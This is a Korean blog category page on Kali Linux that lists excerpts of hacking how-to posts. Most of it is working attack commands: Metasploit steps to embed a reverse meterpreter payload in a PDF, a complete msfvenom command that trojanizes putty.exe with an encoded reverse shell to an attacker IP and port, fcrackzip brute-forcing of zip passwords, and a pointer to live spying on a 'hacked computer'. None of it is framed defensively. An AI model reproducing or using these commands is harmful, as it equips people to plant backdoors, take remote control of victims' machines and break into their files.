본문 바로가기

칼리리눅스4

MSF pdf파일을 트로이목마로 만들기 1.use exploit/windows/fileformat/adobe_pdf_embedded_exe 2.set payload windows/meterpreter/reverse_tcp 3.set lhost 공격자아이피 4.set lport 아무 포트번호 5.set infilename pdf파일경로 6.exploit 2023. 12. 27.
putty.exe 안에 트로이목마 넣기 우선적으로 윈도우의 putty.exe 실행파일을 칼리리눅스에 넣어줍니다. 그 후 다음 명령을 사용합니다. msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.0.8 lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o fakeputty.exe -a : 아키텍트 - x86 -x : putty.exe를 사용하겠다 -k : 오리지날 putty.exe를 keep 하겠다. -e : 인코딩 -i : 반복을 한다는것 인코딩을 3번 반복 -b : 인코딩할때 무시할 문자 -f : 파일 확장자 exe -o : output 실질적으로는 putty 뿐.. 2023. 12. 27.
암호로 압축된 파일의 압축파일 암호 알아내는법 - [fcrackzip] 칼리 리눅스에서는 apt-get install fcrackzip 를 사용하여 다운로드합니다. fcrackzip --help 명령어로 각종 옵션들의 도움말을 보실수 있습니다. 기본적으로는 거의 # fcrackzip -b -c Aa1! -l 1-8 -u Alzip.zip 이런식으로 사용합니다. -b는 무차별 대입 공격 -c는 charset으로 1을 넣으면 숫자들 a를 넣으면 문자들 A는 대문자 !는 특수문자들을 사용합니다. -l 은 length로 1-8이면 1자부터 8자까지 길이를 전부 대입합니다. -u는 암호을 풀 알집파일을 선택해주면 됩니다. 이 방법은 아무래도 무차별 대입공격을 사용하는 툴이다 보니 시간이 굉장히 오래걸릴 수 있습니다.. 2023. 12. 27.
해킹된 컴퓨터를 실시간 모니터링하기 & 자동 스크린샷 캡처 https://blog.naver.com/dhwkffk/221930979010 해킹된 컴퓨터를 실시간 모니터링하기 & 자동 스크린샷 캡처 해킹은 msfvenom으로 바이러스를 만들고 handler.rc로 리스닝을 하여 해킹하였습니다. 1.VNC 라는 메타... blog.naver.com 2023. 12. 26.